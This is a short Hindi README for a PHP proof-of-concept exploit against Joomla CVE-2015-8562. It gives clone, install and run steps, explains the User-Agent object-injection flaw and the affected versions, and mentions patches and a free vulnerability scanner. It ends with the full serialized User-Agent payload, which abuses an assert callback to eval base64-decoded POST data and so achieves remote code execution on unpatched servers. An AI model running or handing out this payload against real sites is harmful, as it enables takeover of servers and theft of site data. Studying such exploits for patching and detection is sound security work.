
Joomla के CVE-2015-8562 भेद्यता के लिए एक अवधारणा प्रमाण
Joomla के CVE-2015-8562 भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट
यह PoC Gary के python कार्यान्वयन की लगभग 1:1 प्रतिलिपि है, जो exploit-db पर होस्ट की गई है।
इसे स्थापित करना बहुत आसान है:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
एक बार composer सब कुछ स्थापित कर दे, तो आपको exploit.php में $target बदलना होगा।
उसके बाद आप तैयार हैं:
php exploit.php
दिसंबर 2015 में Joomla में एक भेद्यता पाई गई थी। यह दूरस्थ हमलावरों को PHP ऑब्जेक्ट इंजेक्शन हमले करने और HTTP User-Agent हैडर के माध्यम से मनमाना PHP कोड निष्पादित करने की अनुमति देती है।
यह भेद्यता Joomla के सभी संस्करणों को प्रभावित करती है। v1.5.x, v2.5x और v3.x के लिए एक पैच पहले ही जारी किया जा चुका है।
यदि आप PHP >= 5.4.45, >= 5.5.29 या >= 5.6.13 चला रहे हैं, तो आप सुरक्षित हैं क्योंकि यह शोषण CVE-2015-6835 का भी उपयोग करता है।
PatrolServer के Nikos Verschore ने एक बहुत विस्तृत ब्लॉग पोस्ट लिखा था और इस भेद्यता को समझने में बहुत मददगार थे। आप उनके मिनी-स्कैनर का मुफ्त में उपयोग कर सकते हैं ताकि जाँच सकें कि आपकी साइट जोखिम में है या नहीं।
यह भेजा गया User-Agent हैडर इस तरह दिखता है:
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}